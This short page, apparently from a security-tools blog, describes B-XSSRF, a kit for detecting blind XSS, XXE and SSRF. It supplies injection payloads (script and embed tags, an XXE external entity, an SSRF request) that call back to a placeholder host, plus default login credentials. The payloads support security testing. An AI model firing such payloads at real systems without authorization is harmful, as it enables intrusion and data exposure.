B-XSSRF is a toolkit to detect and keep track on Blind XSS, XXE & SSRF.
Read More – RedHunt OS : Virtual Machine for Adversary Emulation & Threat Hunting
SETUP
BLIND XSS
<embed src=”http://mysite.com/bxssrf/request.php”>
<script src=”http://mysite.com/bxssrf/request.php”>
BLIND XXE
<?xml version=”1.0″ ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM “http://mysite.com/bxssrf/request.php”> %ext;
]>
<r>
SSRF
GET /testssrf.php=http://mysite.com/bxssrf/request.php
USER : admin@test.com
PASS : 123456
Prompt injection is a type of security vulnerability that can be exploited to control the…
Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly…
Winit is a robust, cross-platform library designed for creating and managing windows in Rust applications.…
In today’s digital age, convenience often comes at the cost of security. One such overlooked…
Terminal GPT (tgpt) offers a seamless way to bring the power of ChatGPT 3.5 directly…
garak checks if an LLM can be made to fail in a way we don't…